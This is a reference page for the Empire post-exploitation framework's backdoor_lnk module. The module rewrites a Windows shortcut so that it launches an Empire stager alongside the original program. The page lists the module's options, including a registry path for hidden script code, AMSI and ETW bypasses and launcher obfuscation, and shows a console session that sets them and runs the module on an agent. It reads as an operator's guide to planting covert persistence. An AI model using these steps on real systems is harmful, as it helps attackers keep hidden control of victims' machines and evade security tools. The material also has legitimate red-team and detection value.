Invoke-BackdoorLNK - Empire Module
This page contains detailed information about how to use the powershell/persistence/userland/backdoor_lnk Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-BackdoorLNK
Module: powershell/persistence/userland/backdoor_lnk
Source code [1]: empire/server/modules/powershell/persistence/userland/backdoor_lnk.yaml
Source code [2]: empire/server/modules/powershell/persistence/userland/backdoor_lnk.py
MITRE ATT&CK:
T1204, T1023
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes
Backdoor a specified .LNK file with a version that launches the original binary and then an Empire stager.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the backdoor_lnk module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the backdoor_lnk module:
Agent
Agent to run module on.
LNKPath
Full path to the .LNK to backdoor.
Listener
Listener to use.
RegPath
Registry location to store the script code. Last element is the key name.
Default value: HKCU:\Software\Microsoft\Windows\debug
.
Additional Module Options
This is a list of additional options that are supported by the backdoor_lnk module:
Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw
.
Cleanup
Switch. Restore the original .LNK settings.
ExtFile
Use an external file for the payload instead of a stager.
Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False
.
ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1
.
Proxy
Proxy to use for request (default, none, or other).
Default value: default
.
ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default
.
UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default
.
Backdoor_lnk Example Usage
Here's an example of how to use the backdoor_lnk module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/userland/backdoor_lnk
Author @harmj0y
Background True
Comments http://windowsitpro.com/powershell/working-shortcuts-windows-
powershell
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-
side-attacks.html
https://github.com/samratashok/nishang
http://blog.trendmicro.com/trendlabs-security-intelligence/black-
magic-windows-powershell-used-again-in-new-attack/
Description Backdoor a specified .LNK file with a version that launches the
original binary and then an Empire stager.
Language powershell
Name powershell/persistence/userland/backdoor_lnk
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1204
http://attack.mitre.org/techniques/T1023
,Record Options----,-------------------------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|------------------|-------------------------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|------------------|-------------------------------------|----------|-------------------------------------|
| Bypasses | mattifestation etw | False | Bypasses as a space separated list |
| | | | to be prepended to the launcher. |
|------------------|-------------------------------------|----------|-------------------------------------|
| Cleanup | | False | Switch. Restore the original .LNK |
| | | | settings. |
|------------------|-------------------------------------|----------|-------------------------------------|
| ExtFile | | False | Use an external file for the |
| | | | payload instead of a stager. |
|------------------|-------------------------------------|----------|-------------------------------------|
| LNKPath | | True | Full path to the .LNK to backdoor. |
|------------------|-------------------------------------|----------|-------------------------------------|
| Listener | | True | Listener to use. |
|------------------|-------------------------------------|----------|-------------------------------------|
| Obfuscate | False | False | Switch. Obfuscate the launcher |
| | | | powershell code, uses the |
| | | | ObfuscateCommand for obfuscation |
| | | | types. For powershell only. |
|------------------|-------------------------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1 | False | The Invoke-Obfuscation command to |
| | | | use. Only used if Obfuscate switch |
| | | | is True. For powershell only. |
|------------------|-------------------------------------|----------|-------------------------------------|
| Proxy | default | False | Proxy to use for request (default, |
| | | | none, or other). |
|------------------|-------------------------------------|----------|-------------------------------------|
| ProxyCreds | default | False | Proxy credentials |
| | | | ([domain\]username:password) to use |
| | | | for request (default, none, or |
| | | | other). |
|------------------|-------------------------------------|----------|-------------------------------------|
| RegPath | HKCU:\Software\Microsoft\Windows\de | True | Registry location to store the |
| | bug | | script code. Last element is the |
| | | | key name. |
|------------------|-------------------------------------|----------|-------------------------------------|
| UserAgent | default | False | User-agent string to use for the |
| | | | staging request (default, none, or |
| | | | other). |
'------------------'-------------------------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/persistence/userland/backdoor_lnk) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/userland/backdoor_lnk) > set LNKPath value
[*] Set LNKPath to value
(Empire: usemodule/powershell/persistence/userland/backdoor_lnk) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/powershell/persistence/userland/backdoor_lnk) > set RegPath HKCU:\Software\Microsoft\Windows\debug
[*] Set RegPath to HKCU:\Software\Microsoft\Windows\debug
(Empire: usemodule/powershell/persistence/userland/backdoor_lnk) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/userland/backdoor_lnk.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/userland/backdoor_lnk.py
- http://windowsitpro.com/powershell/working-shortcuts-windows-powershell
- http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
- https://github.com/samratashok/nishang
- http://blog.trendmicro.com/trendlabs-security-intelligence/black-magic-windows-powershell-used-again-in-new-attack/
- http://attack.mitre.org/techniques/T1204
- http://attack.mitre.org/techniques/T1023
See Also
Check also the following modules related to this module:
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.